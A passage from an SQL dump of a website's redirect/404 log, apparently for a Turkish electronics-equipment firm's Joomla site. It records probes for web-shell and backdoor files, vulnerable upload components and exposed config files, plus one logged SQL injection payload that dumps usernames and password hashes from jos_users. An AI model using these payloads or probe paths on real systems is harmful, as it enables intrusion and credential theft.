00:00:00',301),(18627,'http://3s-technologies.com.tr/tr/plugins/aiudok.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:20:04','0000-00-00 00:00:00',301),(18628,'http://3s-technologies.com.tr/tr/statslive/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:52:57','0000-00-00 00:00:00',301),(18629,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/themes/stiky.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:58:41','0000-00-00 00:00:00',301),(18630,'http://3s-technologies.com.tr/tr/ws0.php',NULL,'http://site.ru','',5,0,'2018-02-22 11:26:17','0000-00-00 00:00:00',301),(18631,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php',NULL,'http://site.ru','',2,0,'2018-02-22 11:27:00','0000-00-00 00:00:00',301),(18632,'http://3s-technologies.com.tr/tr/modules/mod_articles_categories/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 11:28:30','0000-00-00 00:00:00',301),(18633,'https://www.3s-technologies.com.tr/tr/urunler/thru-hole/jv131-detail',NULL,'','',3,0,'2018-02-22 11:35:06','0000-00-00 00:00:00',301),(18634,'http://3s-technologies.com.tr/tr/templates/jblank/html/mod_users_latest/mod_users_latest.php',NULL,'http://site.ru','',1,0,'2018-02-22 12:21:19','0000-00-00 00:00:00',301),(18635,'http://3s-technologies.com.tr/tr/sizings.php',NULL,'http://site.ru','',5,0,'2018-02-22 12:21:48','0000-00-00 00:00:00',301),(18636,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-02-22 12:44:47','0000-00-00 00:00:00',301),(18637,'http://3s-technologies.com.tr/tr/templates/bvqfmgz.php',NULL,'http://site.ru','',2,0,'2018-02-22 12:54:13','0000-00-00 00:00:00',301),(18638,'http://3s-technologies.com.tr/tr/tplpage.php',NULL,'http://site.ru','',1,0,'2018-02-22 12:54:21','0000-00-00 00:00:00',301),(18639,'http://3s-technologies.com.tr/tr/templates/jblank/html/com_content/archive/archive.php',NULL,'http://site.ru','',2,0,'2018-02-22 14:49:54','0000-00-00 00:00:00',301),(18640,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslider/shell.php',NULL,'http://site.ru','',1,0,'2018-02-22 15:22:53','0000-00-00 00:00:00',301),(18641,'http://3s-technologies.com.tr/tr/modules/mod_users_latest/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 15:22:56','0000-00-00 00:00:00',301),(18642,'http://3s-technologies.com.tr/tr/modules/mod_xmlrpc/mod_xmlrpc.php',NULL,'http://site.ru','',1,0,'2018-02-22 15:23:07','0000-00-00 00:00:00',301),(18643,'http://3s-technologies.com.tr/tr/templates/beez5/javascript/javascript.php',NULL,'http://site.ru','',3,0,'2018-02-22 15:23:15','0000-00-00 00:00:00',301),(18644,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-02-22 15:44:45','0000-00-00 00:00:00',301),(18645,'http://3s-technologies.com.tr/tr/plugins/system/languagecode/language/en-gb/backup.php',NULL,'http://site.ru','',1,0,'2018-02-22 16:07:04','0000-00-00 00:00:00',301),(18646,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,ordering/results,1-20',NULL,'','',1,0,'2018-02-22 16:34:45','0000-00-00 00:00:00',301),(18647,'http://3s-technologies.com.tr/tr/plugins/editors/yukesw.php',NULL,'http://site.ru','',2,0,'2018-02-22 17:14:30','0000-00-00 00:00:00',301),(18648,'http://3s-technologies.com.tr/tr/temp1-1.php',NULL,'http://site.ru','',3,0,'2018-02-22 17:14:39','0000-00-00 00:00:00',301),(18649,'http://3s-technologies.com.tr/tr/tmp/i.php',NULL,'http://site.ru','',1,0,'2018-02-22 17:16:31','0000-00-00 00:00:00',301),(18650,'http://3s-technologies.com.tr/tr/modules/fphofir.php',NULL,'http://site.ru','',1,0,'2018-02-22 17:17:11','0000-00-00 00:00:00',301),(18651,'http://3s-technologies.com.tr/tr/networksa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-22 17:47:12','0000-00-00 00:00:00',301),(18652,'http://3s-technologies.com.tr/tr/modules/mod_stats/rfziea.php',NULL,'http://site.ru','',2,0,'2018-02-22 17:48:02','0000-00-00 00:00:00',301),(18653,'http://3s-technologies.com.tr/tr/templates/jblank/html/mod_footer/mod_footer.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:21:27','0000-00-00 00:00:00',301),(18654,'http://3s-technologies.com.tr/tr/test/logo_img.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-22 18:21:40','0000-00-00 00:00:00',301),(18655,'http://3s-technologies.com.tr/tr/templates/atomic/language/language.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:22:50','0000-00-00 00:00:00',301),(18656,'http://3s-technologies.com.tr/tr/mrswenvsr.php',NULL,'http://site.ru','',6,0,'2018-02-22 18:23:00','0000-00-00 00:00:00',301),(18657,'http://3s-technologies.com.tr/tr/modules/mod_stats/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:23:46','0000-00-00 00:00:00',301),(18658,'http://3s-technologies.com.tr/tr/templates/jblank/html/com_content/form/form.php',NULL,'http://site.ru','',4,0,'2018-02-22 18:29:05','0000-00-00 00:00:00',301),(18659,'http://3s-technologies.com.tr/tr/plugins/logo_img.php.suspected',NULL,'http://site.ru','',7,0,'2018-02-22 18:36:54','0000-00-00 00:00:00',301),(18660,'http://3s-technologies.com.tr/tr/modules/mod_articles_category/tmpl/sun.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:54:45','0000-00-00 00:00:00',301),(18661,'http://3s-technologies.com.tr/tr/tmp/r.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:54:46','0000-00-00 00:00:00',301),(18662,'http://3s-technologies.com.tr/tr/phpmyadmin/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:55:26','0000-00-00 00:00:00',301),(18663,'http://3s-technologies.com.tr/tr/templates/jblank/html/mod_banners/mod_banners.php',NULL,'http://site.ru','',2,0,'2018-02-22 18:55:37','0000-00-00 00:00:00',301),(18664,'http://3s-technologies.com.tr/tr/templates/rt_afterburner_j15/js/gzencode.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:55:56','0000-00-00 00:00:00',301),(18665,'http://3s-technologies.com.tr/tr/templates/nulag.php',NULL,'http://site.ru','',1,0,'2018-02-22 18:56:05','0000-00-00 00:00:00',301),(18666,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/results,1-20',NULL,'','',1,0,'2018-02-22 19:51:38','0000-00-00 00:00:00',301),(18667,'http://3s-technologies.com.tr/tr/modules/mod_articles_news/media-views-rtl.php',NULL,'http://site.ru','',2,0,'2018-02-22 20:01:27','0000-00-00 00:00:00',301),(18668,'http://3s-technologies.com.tr/tr/modules/mod_custom/tmpl/map.php',NULL,'http://site.ru','',2,0,'2018-02-22 20:03:01','0000-00-00 00:00:00',301),(18669,'http://3s-technologies.com.tr/tr/cli/css.php',NULL,'http://site.ru','',2,0,'2018-02-22 20:03:09','0000-00-00 00:00:00',301),(18670,'http://3s-technologies.com.tr/tr/templates/jblank/html/com_mailto/mailto/mailto.php',NULL,'http://site.ru','',7,0,'2018-02-22 21:08:31','0000-00-00 00:00:00',301),(18671,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslider/wp-plugins.php',NULL,'http://site.ru','',2,0,'2018-02-22 21:39:18','0000-00-00 00:00:00',301),(18672,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/settings.php',NULL,'http://site.ru','',1,0,'2018-02-22 22:11:58','0000-00-00 00:00:00',301),(18673,'http://3s-technologies.com.tr/tr/templates/jblank/html/com_newsfeeds/newsfeed/newsfeed.php',NULL,'http://site.ru','',1,0,'2018-02-22 23:18:28','0000-00-00 00:00:00',301),(18674,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-20',NULL,'','',3,0,'2018-02-22 23:40:29','0000-00-00 00:00:00',301),(18675,'http://3s-technologies.com.tr/tr/templates/beez_20/images/nature/nature.php',NULL,'http://site.ru','',2,0,'2018-02-23 00:19:14','0000-00-00 00:00:00',301),(18676,'http://3s-technologies.com.tr/tr/templates/beez5/html/html.php',NULL,'http://site.ru','',4,0,'2018-02-23 00:19:23','0000-00-00 00:00:00',301),(18677,'http://3s-technologies.com.tr/tr/system_info.php',NULL,'http://site.ru','',1,0,'2018-02-23 00:49:12','0000-00-00 00:00:00',301),(18678,'http://3s-technologies.com.tr/tr/popup-pomo.php',NULL,'http://site.ru','',4,0,'2018-02-23 00:49:13','0000-00-00 00:00:00',301),(18679,'http://3s-technologies.com.tr/tr/popup-pomo.phpdel',NULL,'http://site.ru','',2,0,'2018-02-23 00:55:54','0000-00-00 00:00:00',301),(18680,'http://3s-technologies.com.tr/tr/mondialrelay/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-23 00:58:06','0000-00-00 00:00:00',301),(18681,'http://3s-technologies.com.tr/tr/templates/beez5/html/com_content/categories/categories.php',NULL,'http://site.ru','',1,0,'2018-02-23 01:47:24','0000-00-00 00:00:00',301),(18682,'http://3s-technologies.com.tr/tr/ogone/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-23 01:47:46','0000-00-00 00:00:00',301),(18683,'http://3s-technologies.com.tr/tr/templates/bvqfmgz.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-23 01:47:51','0000-00-00 00:00:00',301),(18684,'http://3s-technologies.com.tr/tr/templates/beez_20/images/system/system.php',NULL,'http://site.ru','',2,0,'2018-02-23 02:46:17','0000-00-00 00:00:00',301),(18685,'http://3s-technologies.com.tr/tr/plugins/content/settings.php',NULL,'http://site.ru','',3,0,'2018-02-23 04:12:33','0000-00-00 00:00:00',301),(18686,'http://3s-technologies.com.tr/tr/templates/atomic/atomic.php',NULL,'http://site.ru','',1,0,'2018-02-23 04:17:03','0000-00-00 00:00:00',301),(18687,'http://3s-technologies.com.tr/tr/plugins/captcha/captcha.php',NULL,'http://site.ru','',1,0,'2018-02-23 04:38:14','0000-00-00 00:00:00',301),(18688,'http://3s-technologies.com.tr/tr/templates/jblank/html/mod_weblinks/mod_weblinks.php',NULL,'http://site.ru','',6,0,'2018-02-23 04:39:57','0000-00-00 00:00:00',301),(18689,'http://3s-technologies.com.tr/tr/paypalapi/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-23 05:07:31','0000-00-00 00:00:00',301),(18690,'http://3s-technologies.com.tr/tr/templates/jblank/html/mod_search/mod_search.php',NULL,'http://site.ru','',2,0,'2018-02-23 05:07:32','0000-00-00 00:00:00',301),(18691,'https://www.3s-technologies.com.tr/tr/urunler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',2,0,'2018-02-23 05:15:55','0000-00-00 00:00:00',301),(18692,'http://3s-technologies.com.tr/tr/modules/mod_wrapper/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-23 05:35:35','0000-00-00 00:00:00',301),(18693,'http://3s-technologies.com.tr/tr/pqcsfx3h.php',NULL,'http://site.ru','',2,0,'2018-02-23 05:38:43','0000-00-00 00:00:00',301),(18694,'http://3s-technologies.com.tr/tr/modules/mod_articles_latest/jkifzdf.php',NULL,'http://site.ru','',4,0,'2018-02-23 06:04:44','0000-00-00 00:00:00',301),(18695,'http://3s-technologies.com.tr/tr/paypal/popup-pomo.php',NULL,'http://site.ru','',5,0,'2018-02-23 06:30:46','0000-00-00 00:00:00',301),(18696,'http://3s-technologies.com.tr/tr/templates/atomic/css/blueprint/plugins/buttons/icons/icons.php',NULL,'http://site.ru','',3,0,'2018-02-23 06:31:03','0000-00-00 00:00:00',301),(18697,'http://3s-technologies.com.tr/tr/templates/t3_blank/images/themes/dark/ico/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-23 06:33:36','0000-00-00 00:00:00',301),(18698,'http://3s-technologies.com.tr/tr/xmlrpc/system_infos.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-23 06:58:00','0000-00-00 00:00:00',301),(18699,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/js/map.php',NULL,'http://site.ru','',2,0,'2018-02-23 06:59:05','0000-00-00 00:00:00',301),(18700,'http://3s-technologies.com.tr/tr/modules/mod_system.php',NULL,'http://site.ru','',2,0,'2018-02-23 07:05:06','0000-00-00 00:00:00',301),(18701,'http://3s-technologies.com.tr/tr/plugins/system/vblrxyk.php',NULL,'http://site.ru','',2,0,'2018-02-23 07:28:46','0000-00-00 00:00:00',301),(18702,'http://3s-technologies.com.tr/tr/templates/beez_20/javascript/wp-class.php',NULL,'http://site.ru','',3,0,'2018-02-23 07:31:56','0000-00-00 00:00:00',301),(18703,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-20',NULL,'','',1,0,'2018-02-23 07:44:42','0000-00-00 00:00:00',301),(18704,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name/results,1-30?error=404',NULL,'','',7,0,'2018-02-23 07:54:42','0000-00-00 00:00:00',301),(18705,'http://3s-technologies.com.tr/tr/modules/mod_yoo_gallery/yoo_gallery/lib/debug.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:28:54','0000-00-00 00:00:00',301),(18706,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-23 09:19:42','0000-00-00 00:00:00',301),(18707,'http://3s-technologies.com.tr/tr/setupconfiga/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-23 09:48:01','0000-00-00 00:00:00',301),(18708,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',1,0,'2018-02-23 09:55:42','0000-00-00 00:00:00',301),(18709,'http://3s-technologies.com.tr/tr/test/logo_img.php',NULL,'http://site.ru','',2,0,'2018-02-23 10:43:08','0000-00-00 00:00:00',301),(18710,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/mysql.php',NULL,'http://site.ru','',2,0,'2018-02-23 11:10:04','0000-00-00 00:00:00',301),(18711,'http://3s-technologies.com.tr/tr/tmp/sfx.php',NULL,'http://site.ru','',10,0,'2018-02-23 11:10:17','0000-00-00 00:00:00',301),(18712,'http://3s-technologies.com.tr/tr/tmp/tmp.php',NULL,'http://site.ru','',3,0,'2018-02-23 12:22:33','0000-00-00 00:00:00',301),(18713,'http://3s-technologies.com.tr/tr/tmp/s.php',NULL,'http://site.ru','',2,0,'2018-02-23 12:52:25','0000-00-00 00:00:00',301),(18714,'http://3s-technologies.com.tr/tr/plugins/authentication/cookie/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-23 13:17:59','0000-00-00 00:00:00',301),(18715,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/template/css/lrliam.php',NULL,'http://site.ru','',7,0,'2018-02-23 13:18:53','0000-00-00 00:00:00',301),(18716,'http://3s-technologies.com.tr/tr/templates/themza_j15_19/tlwvoa.php',NULL,'http://site.ru','',3,0,'2018-02-23 13:46:17','0000-00-00 00:00:00',301),(18717,'http://3s-technologies.com.tr/tr/terma/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-02-23 14:14:21','0000-00-00 00:00:00',301),(18718,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,category_name/results,1-10',NULL,'','',1,0,'2018-02-23 15:19:41','0000-00-00 00:00:00',301),(18719,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-02-23 16:22:41','0000-00-00 00:00:00',301),(18720,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-50',NULL,'','',1,0,'2018-02-23 18:10:40','0000-00-00 00:00:00',301),(18721,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_sku/results,1-5?language=en-gb',NULL,'','',1,0,'2018-02-23 21:19:40','0000-00-00 00:00:00',301),(18722,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-50',NULL,'','',1,0,'2018-02-24 00:10:39','0000-00-00 00:00:00',301),(18723,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-20',NULL,'','',1,0,'2018-02-24 11:12:41','0000-00-00 00:00:00',301),(18724,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',1,0,'2018-02-24 16:00:09','0000-00-00 00:00:00',301),(18725,'http://3s-technologies.com.tr/tr/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1',NULL,'','',1,0,'2018-02-24 17:43:48','0000-00-00 00:00:00',301),(18726,'http://3s-technologies.com.tr/tr/images/stories/explore.gif',NULL,'','',1,0,'2018-02-24 17:48:56','0000-00-00 00:00:00',301),(18727,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/b2jcontact.php',NULL,'','',40,0,'2018-02-24 21:06:14','0000-00-00 00:00:00',301),(18728,'http://3s-technologies.com.tr/tr/components/com_foxcontact',NULL,'','',2,0,'2018-02-25 00:19:33','0000-00-00 00:00:00',301),(18729,'http://www.3s-technologies.com.tr/tr/sftp-config.json',NULL,'','',6,0,'2018-02-25 03:31:59','0000-00-00 00:00:00',301),(18730,'https://www.3s-technologies.com.tr/index.php/en/products/am100-detail?print=1&tmpl=component',NULL,'','',1,0,'2018-02-25 08:40:32','0000-00-00 00:00:00',301),(18731,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-5',NULL,'','',1,0,'2018-02-25 12:19:51','0000-00-00 00:00:00',301),(18732,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering/results,1-10?language=tr-tr&filter_product=',NULL,'','',1,0,'2018-02-25 18:01:38','0000-00-00 00:00:00',301),(18733,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/results,1-10',NULL,'','',1,0,'2018-02-25 23:27:06','0000-00-00 00:00:00',301),(18734,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-25 23:52:49','0000-00-00 00:00:00',301),(18735,'http://3s-technologies.com.tr/tr/demoistrator/index.php',NULL,'','',1,0,'2018-02-26 11:02:31','0000-00-00 00:00:00',301),(18736,'http://3s-technologies.com.tr/tr/components/com_weblinks/models/setup.php',NULL,'','',1,0,'2018-02-26 16:05:26','0000-00-00 00:00:00',301),(18737,'http://www.3s-technologies.com.tr/en/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',7,0,'2018-02-27 01:44:02','0000-00-00 00:00:00',301),(18738,'http://3s-technologies.com.tr/tr/components/com_jdownloads/jdownloads.php',NULL,'','',10,0,'2018-02-27 09:31:48','0000-00-00 00:00:00',301),(18739,'http://3s-technologies.com.tr/tr/wp-organizer.php',NULL,'http://site.ru','',6,0,'2018-02-27 10:59:22','0000-00-00 00:00:00',301),(18740,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/shell.php',NULL,'http://site.ru','',1,0,'2018-02-27 12:12:37','0000-00-00 00:00:00',301),(18741,'http://3s-technologies.com.tr/tr/?option=com_tag&task=add&article_id=?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(id,0x3a,username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component',NULL,'','',1,0,'2018-02-27 17:32:34','0000-00-00 00:00:00',301),(18742,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/results,1-15',NULL,'','',3,0,'2018-02-28 14:03:43','0000-00-00 00:00:00',301),(18743,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/results,1-60',NULL,'','',3,0,'2018-02-28 15:33:44','0000-00-00 00:00:00',301),(18744,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/am100-detail',NULL,'','',1,0,'2018-02-28 16:33:21','0000-00-00 00:00:00',301),(18745,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/results,1-150',NULL,'','',3,0,'2018-02-28 17:03:43','0000-00-00 00:00:00',301),(18746,'http://3s-technologies.com.tr/tr//wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2018-03-01 00:17:41','0000-00-00 00:00:00',301),(18747,'http://3s-technologies.com.tr/tr//xmlrpc.php?rsd',NULL,'','',6,0,'2018-03-01 00:17:41','0000-00-00 00:00:00',301),(18748,'http://3s-technologies.com.tr/tr//blog/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2018-03-01 00:17:42','0000-00-00 00:00:00',301),(18749,'http://3s-technologies.com.tr/tr//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2018-03-01 00:17:42','0000-00-00 00:00:00',301),(18750,'http://3s-technologies.com.tr/tr//wp/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2018-03-01 00:17:42','0000-00-00 00:00:00',301),(18751,'http://3s-technologies.com.tr/tr//site/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2018-03-01 00:17:42','0000-00-00 00:00:00',301),(18752,'http://3s-technologies.com.tr/tr//cms/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2018-03-01 00:17:42','0000-00-00 00:00:00',301),(18753,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,ordering',NULL,'','',3,0,'2018-03-01 01:56:57','0000-00-00 00:00:00',301),(18754,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/dirdesc',NULL,'','',4,0,'2018-03-01 04:08:16','0000-00-00 00:00:00',301),(18755,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wpallimport/uploads/rxr.php',NULL,'','',9,0,'2018-03-01 05:24:26','0000-00-00 00:00:00',301),(18756,'http://www.3s-technologies.com.tr/tr/rxr.php',NULL,'','',78,0,'2018-03-01 05:35:25','0000-00-00 00:00:00',301),(18757,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/assignments/rxr_1519880289.php.',NULL,'','',9,0,'2018-03-01 05:36:24','0000-00-00 00:00:00',301),(18758,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc/results,1-150',NULL,'','',4,0,'2018-03-01 05:55:14','0000-00-00 00:00:00',301),(18759,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-15',NULL,'','',5,0,'2018-03-01 06:45:55','0000-00-00 00:00:00',301),(18760,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-60',NULL,'','',9,0,'2018-03-01 07:26:32','0000-00-00 00:00:00',301),(18761,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-30',NULL,'','',2,0,'2018-03-01 09:19:05','0000-00-00 00:00:00',301),(18762,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc/results,1-60',NULL,'','',6,0,'2018-03-01 10:00:39','0000-00-00 00:00:00',301),(18763,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc/results,1-15',NULL,'','',5,0,'2018-03-01 10:16:17','0000-00-00 00:00:00',301),(18764,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc/results,1-30',NULL,'','',5,0,'2018-03-01 13:10:31','0000-00-00 00:00:00',301),(18765,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',1,0,'2018-03-01 14:55:18','0000-00-00 00:00:00',301),(18766,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&itemid=100&lang=tr',NULL,'','',9,0,'2018-03-01 17:14:01','0000-00-00 00:00:00',301),(18767,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering',NULL,'','',2,0,'2018-03-01 22:17:48','0000-00-00 00:00:00',301),(18768,'http://3s-technologies.com.tr/tr/components/max.php',NULL,'','',2,0,'2018-03-02 02:19:22','0000-00-00 00:00:00',301),(18769,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',2,0,'2018-03-02 03:04:45','0000-00-00 00:00:00',301),(18770,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',1,0,'2018-03-02 09:32:44','0000-00-00 00:00:00',301),(18771,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/results,1-10',NULL,'','',2,0,'2018-03-02 11:02:44','0000-00-00 00:00:00',301),(18772,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku',NULL,'','',1,0,'2018-03-02 13:02:43','0000-00-00 00:00:00',301),(18773,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/dirdesc',NULL,'','',1,0,'2018-03-02 16:17:43','0000-00-00 00:00:00',301),(18774,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-03-02 17:17:42','0000-00-00 00:00:00',301),(18775,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-30',NULL,'','',4,0,'2018-03-02 18:00:03','0000-00-00 00:00:00',301),(18776,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc',NULL,'','',8,0,'2018-03-02 19:14:10','0000-00-00 00:00:00',301),(18777,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc/results,1-15',NULL,'','',5,0,'2018-03-02 19:20:28','0000-00-00 00:00:00',301),(18778,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-60',NULL,'','',1,0,'2018-03-02 20:38:52','0000-00-00 00:00:00',301),(18779,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc',NULL,'','',2,0,'2018-03-02 23:17:41','0000-00-00 00:00:00',301),(18780,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-15',NULL,'','',1,0,'2018-03-03 01:45:58','0000-00-00 00:00:00',301),(18781,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-30',NULL,'','',1,0,'2018-03-03 03:10:37','0000-00-00 00:00:00',301),(18782,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-150',NULL,'','',1,0,'2018-03-03 05:38:52','0000-00-00 00:00:00',301),(18783,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-15',NULL,'','',1,0,'2018-03-03 06:42:23','0000-00-00 00:00:00',301),(18784,'http://www.3s-technologies.com.tr/tr/wp-login.php',NULL,'','',445,0,'2018-03-03 07:19:04','0000-00-00 00:00:00',301),(18785,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-30',NULL,'','',1,0,'2018-03-03 08:40:32','0000-00-00 00:00:00',301),(18786,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-150',NULL,'','',1,0,'2018-03-03 12:02:09','0000-00-00 00:00:00',301),(18787,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-30',NULL,'','',1,0,'2018-03-03 12:59:43','0000-00-00 00:00:00',301),(18788,'http://www.3s-technologies.com.tr/tr/?option=com_easybookreloaded',NULL,'','',6,0,'2018-03-03 13:18:27','0000-00-00 00:00:00',301),(18789,'http://www.3s-technologies.com.tr/tr/gaestebuch',NULL,'','',18,0,'2018-03-03 13:18:28','0000-00-00 00:00:00',301),(18790,'http://www.3s-technologies.com.tr/tr/?option=com_easygb',NULL,'','',6,0,'2018-03-03 13:18:29','0000-00-00 00:00:00',301),(18791,'http://www.3s-technologies.com.tr/tr/?option=com_akobook',NULL,'','',6,0,'2018-03-03 13:18:29','0000-00-00 00:00:00',301),(18792,'http://www.3s-technologies.com.tr/tr/?option=com_vitabook',NULL,'','',6,0,'2018-03-03 13:18:29','0000-00-00 